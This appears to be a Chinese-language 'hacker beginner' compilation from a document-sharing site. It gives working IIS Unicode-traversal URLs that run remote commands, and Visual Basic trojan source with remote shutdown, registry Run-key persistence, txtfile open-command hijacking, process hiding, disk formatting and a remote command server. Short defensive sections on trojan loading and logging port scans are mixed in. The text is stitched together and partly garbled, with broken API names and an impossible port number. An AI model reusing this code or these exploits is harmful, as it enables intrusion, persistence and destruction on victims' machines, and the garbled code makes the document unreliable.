搜档网
当前位置:搜档网 › 网络黑客新手入门精选大全

网络黑客新手入门精选大全

网络黑客新手入门必备知识一

各位网络新手,大家好。为了新手们更快的进入奇妙的网络世界,我决定写一篇指导文章。其实我也是个菜鸟,对网络也是略知一二,第一次写教程,有不足之处,肯请赐教。相信会花时间看这篇文章的人,都是对入侵一知半解的。其实,我个人认为,微软的Windows 2K 和NT是世界上应用范围很广,最容易学习的一种操作系统(OS),同时也是漏洞最多的OS,作为新手,我建议大家从2K和NT的入侵开始学起。我会陆续介绍有关入侵的手段及入侵后可以做的有利于自己的事。: )

系统基本知识

1.a.什么是IP:要是真的想说清楚什么是IP,那是一项很繁重的工作。简单的来说,IP就是所有Internet或是局域网上的主机的身份证。所有网络的机器连接起来后,每台机器都会有一个唯一的合法的IP地址,一台机器和别的指定的机器通讯都要依据IP来实现的。IP地址的写法为XXX.XXX.XXX.XXX。有四段数字组成,第一段数字可为1-255,后三段数字可为0-255,且所有的IP地址分为A、B、C、D、E五类,主要是A、B、C三类。其有效范围如下表所示:

类别网络号主机号

A 1~126 0~255 0~255 1~254

B 128~191 0~255 0~255 1~254

C 192~223 0~255 0~255 1~254

有关IP地址的问题可以查阅相关的资料,笔者在此就不再多耗笔墨了。呵呵~~~~~~~~~~~~~: p

1.b.怎样得到自己和别人的IP呢?以Windows 98为例:在“开始”—“运行”里输入:winipcfg。接着,Windows就会打开“IP 配置”。其中,在“Ethernet 适配器信息”—“IP 地址”会显示xxx.xxx.xxx.xxx,这就是你的IP。要想得到别人的IP,可以使用一些工具软件,不过最简单的使用Windows自带的一个小程序ping.exe。在MS-DOS命令行下输入ping https://www.sodocs.net/doc/da12809.html,。会出现:

C:\>ping https://www.sodocs.net/doc/da12809.html,

Pinging https://www.sodocs.net/doc/da12809.html, [xxx.xxx.xxx.xxx] with 32 bytes of data:

Reply from xxx.xxx.xxx.xxx: bytes=32 time=630ms TTL=116

Reply from xxx.xxx.xxx.xxx: bytes=32 time=630ms TTL=116

Reply from xxx.xxx.xxx.xxx: bytes=32 time=120ms TTL=116

Ping statistics for xxx.xxx.xxx.xxx:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 120ms, Maximum = 630ms, Average = 187ms

其中:xxx.xxx.xxx.xxx 就是https://www.sodocs.net/doc/da12809.html,的网络服务器的IP地址。

更多的请看:https://www.sodocs.net/doc/da12809.html,/windows/2003/index.html

2.a.Unicode漏洞:“Unicode漏洞”是微软IIS的一个重大漏洞。2001年最热门漏洞之一。下面我们来简要介绍一下它的原理。

IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令。当IIS打开文件时,如果该文件名包含Unicode字符,它会对其进行解码,如果用户提供一些特殊的编码,将导致IIS错误的打开或者执行某些web根目录以外的文件。攻击者可以利用这个漏洞来绕过IIS的路径检查,去执行或者打开任意的文件。此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,台湾繁体中文也同样存在这样的漏洞。(Win NT4 编码为:%c1%9c ,Win2000 英文版编码为:%c0%af)

假设目标主机为英文版Winodows 2k,IP为xxx.xxx.xxx.xxx,且存在Unicode漏洞,那么我们在浏览器里输入:

http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir ,之后

浏览器就会显示如下内容:

Directory of C:\inetpub\scripts

2002-02-08 15:49 〈DIR〉.

2002-02-08 15:49 〈DIR〉..

2002-02-08 10:20 Index.html

2002-02-08 10:20 background.jpg ........................................

从上面的测试可以看出:"http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd.exe?/c+"后就是DOS命令了:"dir"

以此类推,我们可以利用浏览器远程执行任意命令,看下面的例子:

在浏览器里输入http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+md+d:\Nature,运行后我们可以看到返回这样的结果:

CGI Error

The specified CGI application misbehaved by not returning a complete

set of HTTP headers. The headers it did return are:

英文意思是:

CGI错误

具体的CGI申请有误,不能返回完整的HTTP标题,返回的标题为:

但是,你其实仍然在目标主机的D:\ 里建立了一个名为:Nature的文件夹。

2.b.利用Unicode漏洞我们还可以简单的修改目标主机的WEB文件。一般情况下,我们要修改目标主机的web文件,常用到的方法是利用echo回显、管道工具“>”“>>”。如果你对这些命令不熟悉,可以键入以下命令以查看帮助文档,如:

C:\>echo/?

显示信息,或将命令响应打开或关上。

ECHO [ON OFF]

ECHO [message]

仅键入ECHO 而不加参数,可以显示当前的ECHO 设置。

管道工具“>”“>>”的不同之处

“>”“>>”是将命令产生的输出重新定向,比如写到某个文件或输出到打印机中。

“>>”将产生的内容追加进文件中,“>”则将原文件内容覆盖。

VB黑客编程基础二

一. 调用系统“创建快捷方式”向导

是否为VB不支持创建快捷方式而于着急呢?虽然您可以调用vb5stkit.Dll中的fCreateShellLink函数,但它是为安装程序设计的,快捷方式的默认路径总是从当前用户的“\Start Menu\Programs”开始,也就是说,如果您的Windows95装在C盘上,您无法通过fCreateShellLink函数把快捷方式创建到D盘上去。

现在,给大家介绍一种极为方便、巧妙的方法:用Shell语句调用系统“创建快捷方式”向导。

新建一个项目,在窗体上放一个按钮,双击此按钮,加入以下代码:

Private Sub Command1_Click()

Open App.Path &"\temp.lnk" For Output As #1

Close #1 '以上两句在程序所在目录建立一个临时文件

Shell "Rundll32.exe AppWiz.Cpl,NewLinkHere

"&App.Path &"\temp.lnk"

End Sub

(注意:Shell语句中NewLinkHere后面跟着一个空格才是引号,否则将出错。)

运行程序,按一下命令按钮,怎么样?“创建快捷方式”向导出现了,如果创建成功,快捷方式将取代临时文件temp.lnk的位置,如果选取消,temp.lnk 也会自动消失。当然,您可以在硬盘的任意位置建立temp.lnk。好,现在又可以为您的程序增添一项新功能了。Enjoy!

二. Rundll32.exe的用途

我们知道,用Shell语句只能调用可执行文件,即exe、com、bat和pif文件,有时我们想要调用其他一些系统功能该怎么办呢?此时,Windows提供的Rundll32.exe可大显身手了。下面我们来认识一下这些用法,也许会给您带来一点惊喜。

1.要打开设置系统时间的控制面板文件(Timedate.cpl),只需运行如下代码:

Shell "Rundll32.exe

Shell32.dll,Control_RunDLL Timedate.cpl"

至于打开其他控制面板文件,相信您一定能够举一反三,尝试一下,换个文件名就成了。

2.要运行某一快捷方式(*.lnk)则可以用以下代码:

She11 "Rundll32.exe url.dll, FileProtocolHandler X" (X代表要运行的文件,包括路径,下同。

3. 也可以这样写来打开ActiveMovie控制:

Shell "RUNDLL32.EXE amovie.ocx,Rundll",1

而用Shell "RUNDLL32.EXE amovie.ocx,Rundll /play X",1 将直接播放媒体文件。

4. Shell "rundll32.exe desk.cpl,InstallScreenSaver X”当然是安装屏幕保护啦,如果你写了一个屏幕保护程序,那么可以在安装程序中写上它,而不一定要装到system目录下。顺便提一下,VB不是自捞一个“Application Setup Wizard”么?它的VB源代码都在安装目录下的“\setupkit\setup1”中放着呢,好好把它研究一下。你完全能做出富有个性的安装程序来。

5.按住shift键,右击某一文件,菜单中会出现“打开方式”选项,这也许已不是什么秘密。但现在,用shell "rundll32.exe shell32.dll OpenAs_RunDLL X" 便能直接调用“打开方式”框。

6. 甚至能用这样一句来打印文件(包括HTML所支持的所有文本与图像格式):

Shell "rundll32.exe MSHTML.DLL,PrintHTML X”, 1

怎么样?是不是小有收获呢?这下,您一定会对Rundll32.exe这个平时不起眼的文件另眼相待了,它可是系统运行必不可少的部件呢!其实Shell+Rundll32还能调用其他许多系统功能,比如关于NetMeeting和Telnet方面的。如果您有兴趣,可以到往册表的“我

的电脑\HKEY_CLASSES_ROOT\”或“我的电脑\HKEY_LOCAL_MACHINE\Software\CLASSES”下去看看,本文的内容大都是从那里“抄”来的。只要有足够的决心、信心、耐心,您一定能发现更多有价值的东西。Good luck!

主要也就/showerr.asp?BoardID=0&ErrCodes=60,60&action= 再起作用程序所有代码仅此两段Private Sub Command1_Click() WebBrowser1.Navigate (Text1.Text + "/showerr.asp?BoardID=0&ErrCodes=60,60&action=") End Sub Private Sub Command2_Click() End End Sub 程序下载.

首先,新建一工程,名为Server,新建一个窗体,Name为Server,在窗体中加入一个winsock 控件,Name设为sckServer,协议设为默认的TCP/IP协议。

接下来我们回来Server窗体模块中,添加如下代码:

Private Sub form_Load()

With Me

.sckServer.LocalPort = 88917'本地端口(呵呵!我的生日!)

.sckServer.Listen '开始监听

End With

End Sub

'接受客户端的连接请求。

Private Sub sckServer_ConnectionRequest(ByVal requestID As Long)

With Me

If .sckServer.State <>sckClosed Then .sckServer.Close

.sckServer.Accept (requestID)

End With

End Sub

下面我们来建立客户端程序:新建一个工程,名为Client,把窗体名为Client,在上面加入一个winsock控件,名为sckClient,协议为TCP/IP协议。再加一个按钮cmdConnect 在窗体模块中加入代码:

Private Sub form_Load()

With Me

.sckClient.RemoteHost = "127.0.0.1"'设置远程IP,本例设为本机。

.sckClient.RemotePort = 88917 '远程端口,就为server中的设置一样.

End With

End Sub

Private sub cmdConnect_Click()

SckClient.Connect

End sub

至此,单击Connect按钮我们的两个工程已经可以进行通信了,但看不见,你可以在Client中的sckClient_Connect事件中加入代码:debug.print “Connetion successful!”来查看。

这仅是第一步,一点工作也做不了,下面我们来为它们添加功能。为了简单,本文章只实现一点小小的功能―――关机,重启,注销。好,开始吧!

在Server工程中新建一个模块,Name为modApi,这个模快为一些API函数,添加如下API函数:

Public Declare Function ExitWindowXXX Lib "user32" Alias "ExitWindowXXX" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long

Public Const EWX_LOGOFF = 0

Public Const EWX_REBOOT = 2

Public Const EWX_SHUTDOWN = 1

Public Declare Function ClipCursor Lib "user32" Alias "ClipCursor" (lpRect As Any) As Long

Public Type RECT

Left As Long

Top As Long

Right As Long

Bottom As Long

End Type

注:在两个socket中编程中,进行通信的重要事件是DataArrival事件,用于接收远程数据。

下面在Client工程的Client窗体中放入三个按钮,分别为cmdExit,cmdLogoff,cmdReboot。它们用于对远程的关机,注销,重启操作。分别添加如下代码:

Private Sub cmdExit_Click()

Me.sckClient.SendData "Exit"

End Sub

Private Sub cmdLogoff_Click()

Me.sckClient.SendData "Logoff"

End Sub

Private Sub cmdReboot_Click()

Me.sckClient.SendData "Reboot"

End Sub

全都是对服务端发出请求。下面转到Server工程中:在Server中添加sckServer的DataArrial事件,接收客户端的请求。

Private Sub sckServer_DataArrival(ByVal bytesTotal As Long)

Dim strData As String

With Me

' 接收客户请求的信息

.sckServer.GetData strData

Select Case strData

Case "Exit"

'关机

Call ExitWindowXXX(EWX_SHUTDOWN, 0)

Case "Reboot"

'重启

Call ExitWindowXXX(EWX_REBOOT, 0)

Case "Logoff"

'注销

Call ExitWindowXXX(EWX_LOGOFF, 0)

End Select

End With

End Sub

好了,到此我们已经实现功能了,但还不行,我们要它在背后运行。这简单,在Server 中的form_Load事件中加入一句:me.hide。好这下看不见了,但大家知道木马是一开机就自动运行了,这又是为什么,怎么实现的?把它加入到注册表的启动组中?对,不错,跟我来吧!

回到Server工程中的modApi中加入如下API函数:

Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Public Declare Function RegSetvalueEx Lib "advapi32.dll" Alias "RegSetvalueExA" (ByVal hKey As Long, ByVal lpvalueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long

Public Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Public Const REG_BINARY = 3

Public Const REG_SZ = 1

Public Const HKEY_LOCAL_MACHINE = &H80000002

Public Const HKEY_CLASSES_ROOT = &H80000000

写到注册表启动组中的过程。

Public Sub StartupGroup()

Dim sKey As String

Dim result As Long

Dim hKeyID As Long

Dim sKeyVal As String

sKey = "Systrsy" '启动组中的键,找一个与系统文件相近的。

sKeyVal = "C:/windows/system/systrsy.exe" '木马文件的路径,可以用GetSystemDirectory 来取得系统路径。

result = RegOpenKey(HKEY_LOCAL_MACHINE, _

"Software/Microsoft/Windows/CurrentVersion/Run", hKeyID)

If result = 0 Then

result = RegSetvalueEx(hKeyID, sKey, 0&, REG_SZ, sKeyVal, Len(sKey) + 1)

End If

End Sub

好,就这样简单地完成了。但是,想过没有,如果不是很菜的鸟,到注册表中见一删,我们苦苦的心血不就白白地浪费了吗?不行,还得想让他发现了删也删不掉。请看下面的代码:

Public Sub WriteToTxt()

Dim result As Long

Dim hKeyID As Long

Dim skey As String

Dim skeyVal As String

skey = "txtfile/shell/open/command"

skeyVal = "C:/windows/system/txtView.exe"

result = RegOpenKey(HKEY_CLASSES_ROOT, skeyVal, hKeyID)

If result = 0 Then

result = RegSetvalueEx(hKeyID, skey, 0&, REG_SZ, skeyVal, Len(skeyVal) + 1)

End If

End Sub

肯定不少朋友一看就知道了,原是与txt文件进行关联,一点也不错,但C:/windows/system/txtView.exe是哪里来的,我们的木马是C:/windows/system/systrsy.exe呀。这可是我们木马的分身了。

好,回到Server工程的Server窗体的form_Load中,加入如下代码:

Dim sCurrentPath As String, sSystemDir As String

sCurrentPath = App.Path & "/" & App.EXEName & ".exe"

sSystemDir = “C:/windows/system”

On Error Resume Next

'复制文件成系统目录下的Systrsy.exe

FileCopy sCurrentPath, sSystemDir & "/Systrsy.exe"

On Error Resume Next

复制文件成系统目录下的txtView.exe

FileCopy sCurrentPath, sSystemDir & "/txtView.exe"

调用

Call startupGroup

Call WriteToTxt

'判断程序是否下在运行

If App.PrevInstance Then

'如果已经运行就退出。

End

End If

好了,写到这里一个破坏性木马已经诞生了,我实验过还是比较好的一个,希望大家也能写一个好的木马,能突破冰河(呵呵!)

注意:

1、大家在处理端口是最好使用高端端口,否则会和一些常用端口发生冲突

2、在第一次使用https://www.sodocs.net/doc/da12809.html,的最好看看有关的图书,可能你能写出一款超级木马也说

你可以使用API函数FindWindow和PostMessage去寻找指定的窗口,并关闭它。下面的例子教给你怎样找到并关掉一个Caption为“Caluclator”的程序。

Dim winHwnd As Long

Dim RetVal As Long

winHwnd = FindWindow(vbNullString, "Calculator")

Debug.Print winHwnd

If winHwnd <> 0 Then

RetVal = PostMessage(winHwnd, WM_CLOSE, 0&, 0&)

If RetVal = 0 Then

MsgBox "置入消息错误!"

End If

Else

MsgBox "Calculator没有打开!"

End If

为了让以上的代码工作,你必须在模块文件中什么以下API函数:

Declare Function FindWindow Lib "user32" Alias _

"FindWindowA" (ByVal lpClassName As String, _

ByVal lpWindowName As String) As Long

Declare Function PostMessage Lib "user32" Alias _

"PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, _

ByVal wParam As Long, lParam As Any) As Long

Public Const WM_CLOSE = &H10

网络是互联的,当你从中获取资源的同时,也要经受其中的考验,木马程序会修改并破坏电脑的系统和文件,除了安装杀毒软件(包括防火墙)外,还应该尽可能地掌握系统文件知识。下面简单介绍一下木马的加载方式:

加载方式:定位于System.ini和Win.ini文件

System.ini(位置C:\windows\)

[boot]项原始值配置:“shell=explorer.exe”,explorer.exe是Windows的核心文件之一,每次系统启动时,都会自动加载。

[boot]项修改后配置:“shell=explorer C:\windows\xxx.exe”(xxx.exe假设一木马程序)。

Win.ini(位置C:\windows\)

[windows]项原始值配置:“load=”;“run=”,一般情况下,等号后无启动加载项。

[windows]项修改后配置:“load=”和“run=”后跟非系统、应用启动文件,而是一些你不熟悉的文件名。

解决办法:

执行“运行→msconfig”命令,将System.ini文件和Win.ini文件中被修改的值改回原值,并将原木马程序删除。若不能进入系统,则在进入系统前按“Shift+F5”进入Command Prompt Only方式,分别键入命令edit system.ini和edit win.ini进行修改。

加载方式:隐藏在注册表中(此方式最为隐蔽)。

注意以下注册表项:HKEY LOCAL MACHINE\Software\classes\exefile\shell\open\command\

原始数值数据:"%1"%

被修改后的数值数据:C:\system\xxx.exe "%1"%

原注册表项是运行可执行文件的格式,被修改后就变为每次运行可执行文件时都会先运行C:\system\xxx.exe这个程序。

例如:开机后运行QQ主程序时,该xxx.exe(木马程序)就先被加载了。

解决办法:

当通过防火墙得知某端口被监听,立即下线,检查注册表及系统文件是否被修改,找到木马程序,将其删除。

所谓“病从口入”感染源还是在于加载了木马程序的服务器端。目前,伪装可执行文件图标的方法很多,如:修改扩展名,将文件图标改为文件夹的图标等,并隐藏扩展名,因此接收邮件和下载软件时一定要小心。许多木马程序的文件名很像系统文件名,造成用户对其没有把握,不敢随意删除,因此要不断增长自己的知识才可防备万一。

可以借助一些软件来狙击木马,如:The Cleaner、Trojan Remover等。建议经常去微软网站下载补丁包来修补系统;及时升级病毒库

BO又称“特洛伊木马”,是在美国一次黑客技术讨论会上由一个黑客组织推出的。它其实是一种客户机/服务器程序,其利用的原理就是:在本机直接启动运行的程序拥有与使用者相同的权限。因此如果能够启动服务器端(即被攻击的计算机)的服务器程序,就可以使用相应的客户端工具客户程序直接控制它了。下面来谈谈如何用VB来实现它。

---- 使用VB建立两个程序,一个为客户端程序Client,一个为服务器端程序systry。

---- 在Client工程中建立一个窗体,加载WinSock控件,称为tcpClient,协议选择TCP,再加入两个文本框,用以输入服务器的IP地址或服务器名,然后建立一个按钮,按下之后就可以对连接进行初始化了,代码如下:

Private Sub cmdConnect_Click()

If Len(Text1.Text) = 0 And Len(Text2.Text) = 0 Then

MsgBox ("请输入主机名或主机IP地址。")

Exit Sub

Else

If Len(Text1.Text) > 0 Then

tcpClient.RemoteHost = Text1.Text

Else

tcpClient.RemoteHost = Text2.Text

End If

End If

tcpClient.Connect

Timer1.Enabled = True

End Sub

---- 连接建立之后就可以使用DataArrival事件处理所收到的数据了。

---- 在服务器端systry工程也建立一个窗体,加载WinSock控件,称为tcpServer,协议选择TCP,在Form_Load事件中加入如下代码:

Private Sub Form_Load()

tcpServer.LocalPort = 1999

tcpServer.Listen

End Sub

---- 准备应答客户端程序的请求连接,使用ConnectionRequest事件来应答户端程序的请求,代码如下:

Private Sub tcpServer_ConnectionRequest

(ByVal requestID As Long)

If tcpServer.State < > sckClosed Then

tcpServer.Close‘检查控件的State 属性是否为关闭的。

End If '如果不是,在接受新的连接之前先关闭此连接。

tcpServer.Accept requestID

End Sub

---- 这样在客户端程序按下了连接按钮后,服务器端程序的ConnectionRequest事件被触发,执行了以上的代码。如果不出意外,连接就被建立起来了。

---- 建立连接后服务器端的程序通过DataArrival事件接收客户机端程序所发的指令运行既定的程序。如:把服务器端的驱动器名、目录名、文件名等传到客户机端,客户机端接收后用TreeView控件以树状的形式显示出来,浏览服务器端文件目录;强制关闭或重启服务器端的计算机;屏蔽任务栏窗口;屏蔽开始菜单;按照客户机端传过来的文件名或目录名,而删除它;屏蔽热启动键;运行服务器端的任何程序;还包括获取目标计算机屏幕图象、窗口及进程列表;激活、终止远端进程;打开、关闭、移动远端窗口;控制目标计算机鼠标的移动与动作;交换远端鼠标的左右键;在目标计算机模拟键盘输入,下载、上装文件;提取、创建、修改目标计算机系统注册表关键字;在远端屏幕上显示消息。DataArrival事件程序如下:

Private Sub tcpServer_DataArrival

(ByVal bytesTotal As Long)

Dim strData As String

Dim i As Long

Dim mKey As String

tcpServer.GetData strData

‘接收数据并存入strData

For i = 1 To Len(strData)

‘分离strData中的命令

If Mid(strData, i, 1) = "@" Then

mKey = Left(strData, i - 1)

‘把命令ID号存入mKey

‘把命令参数存入strData

strData = Right(strData, Len(strData) - i)

Exit For

End If

Next i

Select Case Val(mKey)

Case 1

‘驱动器名、目录名、文件名

Case 2

强制关闭服务器端的计算机

Case 3

强制重启服务器端的计算机

Case 4

屏蔽任务栏窗口;

Case 5

屏蔽开始菜单;

Case 6

按照客户机端传过来的文件名或目录名,而删除它;

Case 7

屏蔽热启动键;

Case 8

运行服务器端的任何程序

End Select

End Sub

详细程序略。

---- 客户机端用tcpClient.SendData发命令。命令包括命令ID和命令参数,它们用符号“@”隔开。

---- 另外,当客户机端断开与服务器端的来接后,服务器端应用tcpServer_Close事件,来继续准备接收客户机端的请求,其代码如下:

Private Sub tcpServer_Close()

tcpServer.Close

tcpServer.Listen

End Sub

---- 这就是一个最基本的特洛伊木马程序,只要你的机器运行了服务器端程序,那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了,在我的源程序中有一中方法,是修改系统注册表的方法。

---- 成功的特洛伊木马程序要比这个复杂一些,还有程序的隐藏、自动复制、传播等问题要解决。警告:千万不要用BO程序破坏别人的系统。

软盘是数据的常用载体,我们的软件可能会提供用户将数据备份到软盘上的功能。为避免软盘上有带有病毒的文件,最安全的办法就是提醒用户将软盘格式化。

Visual Basic可以通过调用API函数格式化一个磁盘,无论是软盘还是硬盘。

打开一个新的项目(project1) ,如果你没有更改过缺省模式,那么Visual Basic会自动添加一个form1文件,在form1上添加一个命令控件,将下面的代码拷入。

Option Explicit

Private Declare Function SHFormatDrive Lib"shell32"_

( ByVal Hend AS Long,_

ByVal Drive AS Long,_

ByVal FormatID AS Long,_

ByVal Options AS Long) as Long

Private Sub FormatDisk(intDrive as integer,blnQuickFormat as Boolean)

dim lngReturn As Long;

if (blnQuickFormat) then

lngReturn= SHFormatDrive(0,intDrive,0&,1&)

else

lngReturn= SHFormatDrive(0,intDrive,0&,0&)

end if

end Sub

Private Sub Command1_Click()

call FormatDisk(0,True)

End Sub

运行此程序。

这里有必要提醒读者注意的是,FormatDisk函数的第一个变量很重要,他的值是0,1,2时代表格式化的分别是:A、B、C盘。

注意:读者使用此程序作练习的时候千万不要用硬盘作实验,笔者不为可能发生的错误和损失负责

在一些系统,为了特定目的,经常要求程序隐藏起来运行,例如DCS(集散控制系统)中的后台监控系统、木马控制程序、源码防拷贝等,以减少被发现、截杀和反汇编的风险。这种功能模块要求程序在运行期间不仅不会在桌面出现,也不允许被操作者从任务管理器列表中发现。

程序隐形的原理

对于一个隐形程序而言,最基本的要求是:

1. 不在桌面出现界面;

2. 不在任务栏出现图标;

3. 程序名从任务管理器名单中消失。

对于上述第一点,可以将Form的Visible属性设为False。

要将图标从任务栏中屏蔽掉,可以把Form的ShowInTaskBar改为False。

在Windows环境下,可以调用WIN API函数中的RegisterviceProcess来实现第三个要求。

上述功能,不论用VC、Delphi、VB,还是PB等任何一种高级编程语言都是比较容易实现的。

隐形功能多用于木马程序,但木马程序在许多国家和地区是不合法的,为便于理解,本文用VB结合一个程序防拷贝的实例来讲解。通过获取软件安装路径所在磁盘序列号(磁盘ID),用做对合法用户的判断。以下程序的目的是用于讲解隐形程序的编制和应用,对程序防拷贝内容作了一定程度的简化。

程序隐形的示例

程序的具体编制操作如下:

1. 在VB6.0编程环境中,新建一个工程Project1。

2. 在Project1中添加模块Modulel,在工程属性中将工程名称改为HiddenMen,应用程序标题也改为HiddenMen(以下程序都经过实际运行测试,可以原样复制使用)。

在模块Module1中加入如下声明:

Public Declare Function GetCurrentProcessId Lib “kernel32” () As Long

'获得当前进程ID函数的声明

Publi c Declare Function RegisterServiceProcess Lib “kernel32” (ByVal ProcessId As Long, ByVal ServiceFlags As Long) As Long

'在系统中注册当前进程ID函数的声明

3. 在Project1中新建一个窗体Form1,设置Form1的属性:

form1.Visible=False

form1.ShowInTaskBar=False

在代码窗口添加如下代码:

Priv ate Declare Function GetDriveType Lib “kernel32” Alias “GetDriveTypeA” (ByVal nDrive As String) As Long

'获得当前驱动器类型函数的声明

Private Declare Function GetVolumeInformation Lib “kernel32” Alias “GetV olumeInformationA” (ByVal lpRootPathName As String, ByVal lpVolumeNameBuffer As String, ByVal nV olumeNameSize As Long, lpV olumeSerialNumber As Long, lpMaximumComponentLength As Long, lpFileSystemFlags As Long, ByVal lpFileSystemNameBuffer As String, ByVal nFileSystemNameSize As Long) As Long

'获得当前驱动器信息函数的声明

Private Sub Form_Load()

Dim drive_no As Long, drive_flag As Long

Dim drive_chr As String, drive_disk As String

Dim serial_no As Long, kkk As Long

Dim stemp3 As String, dflag As Boolean

Dim strlabel As String, strtype As String,strc As Long

RegisterServiceProcess GetCurrentProcessId, 1 ' 从系统中取消当前进程

strlabel = String(255, Chr(0))

strtype = String(255, Chr(0))

stemp3 = “172498135”'这是作者C盘的序列号(十进制),读者可根据自己情况更改。dflag = False

For drive_no = 0 To 25

drive_disk = Chr(drive_no + 67)

drive_chr = drive_disk & “:\”

drive_flag = GetDriveType(drive_chr)

If drive_flag = 3 Then

kkk = GetV olumeInformation(drive_chr, strlabel, Len(strlabel), serial_no, 0, 0, strtype, Len(strtype)) '通过GetVolumeInformation获得磁盘序列号

Select Case drive_no

Case 0

strc = serial_no

End Select

If serial_no = stemp3 Then

dflag = True

Exit For

End If

End If

Next drive_no

If drive_no = 26 And dflag = False Then '非法用户

GoTo err:

End If

MsgBox (“HI,合法用户!”)

Exit Sub

err:

MsgBox (“错误!你的C:盘ID号是”& strc)

End Sub

Private Sub Form_Unload(Cancel As Integer)

RegisterServiceProcess GetCurrentProcessId, 0 '从系统中取消当前程序的进程

End Sub

将上述程序代码编译后运行,在出现类似“错误!你的C盘ID号是172498135”对话框时,按下Ctrl+Alt+Del键,看看程序名叫“HiddenMen”是否在任务管理器名单列表里。如果把上述程序稍加改动,可以加到自己特定的程序中去。该程序在隐形运行之中,不知不觉就完成了预定功能。

以上程序在简体中文Windows 98和VB 6.0环境中调试通过。

上网的时候很容易遭到探测,一般探测你个人的入侵者技术不会高明到哪里去。所以根本不能称上黑客,所以本文就用入侵者来代替。他们对普通网民的扫描可以是多端口单IP的扫描或者多IP单端口扫描。前者是通过一些IP工具来取得你的IP,然后尝试利用端口扫描获取你的信息,看你的计算机有没有预先中了木马。然后通过网上的木马端口列表,来获得木马名称。用相应的客户端软件来连接到你的计算机。从而获得密码、以及你的秘密信息。后者则是通过利用如SuperScan等可以大范围扫描IP的软件,扫描打开特定端口的机器。比如,可以扫描打开7626端口的机器,看对方是否中了冰河。然后,入侵者就用客户端连接到服务器从而入侵你的计算机。

这些扫描是简单的TCP的Connect扫描。所以无法避开防火墙的追踪。网民就可以利用天网等防火墙软件来获取对方的IP。相信很多DIY迷或者编程爱好者总是想拥有属于自己的类似的工具。本文就给你讲述如何用VB来获得探测你的入侵者的IP地址,然后……我可没有教你用蓝屏炸弹或者蜗牛炸弹去炸它哦。毕竟,我们没有入侵者的野心,本程序还可以让你监听80端口,来察看对方对你进行的常规扫描。要看懂本文,你需要有一定的VB 基础。

好了,废话少说,我们来看看本程序的基本原理:

入侵者通过Connect本机的端口,然后通过是否成功,来获得信息。由于TCP的三次握手原理。他必定会留下自己的IP,我们就利用这一个原理来获得对方的IP。

Winsock控件的属性、方法和事件在我上次写的《.用winsock制作漏洞扫描器》一文中已经叙述过,这里就不再介绍。大家还一定记得RemoteHostIP和LocalPort属性吧。这就是对方的IP和自己的端口。聪明的你应该明白了吧。通过这两个属性就可以清楚的获得对方的IP地址和他正在扫描的本地端口。

因为不可能一个端口只有一个人会扫描,所以本程序我们需要使用到控件数组。这个概念的描述大家可以查找MSDN。本程序的流程是:

1、定义需要监听的端口

2、装载一定数量的Winsock1控件,从需要监听的端口列表中获得数据。一一开启监听功能。(Listen)

3、当某一个控件接收到连接的事件发生,就把得到的RemoteIP和LocalPort加入日志

4、加载一个Winsock2,继续捕获数据(Getdata)

5、Winsock2数据到达记录数据

程序的基本概念都介绍完了,相信你对本程序已经有了一定的认识。现在我们就来开始我们的工作:

程序的控件以及说明如下:

控件名控件类型属性

Label1 Label Caption=”增加端口”

Command1 command Caption=”添加”

Command2 command Caption=”监听”

Command3 command Caption=”退出”

Listports Listbox 无

TxtLog Richtextbox 无

程序的代码以及说明如下:

‘本程序在VB6.0+Windows2000下测试通过!

Dim tmpstr As String

Dim NOW_OUT As Integer ''总共出去连接的有几个Winsock

Private Sub Command1_Click()

ListPorts.AddItem txtADDPORT.Text

End Sub

Private Sub Command2_Click()

On Error Resume Next

If Command2.Caption = "监听" Then

For i = 0 To ListPorts.ListCount - 1

Load Winsock1(i + 1) ''加载监听端口的winsock1数组控件

Winsock1(i + 1).LocalPort = ListPorts.List(i) ''设定端口

Winsock1(i + 1).Listen ''监听

相关主题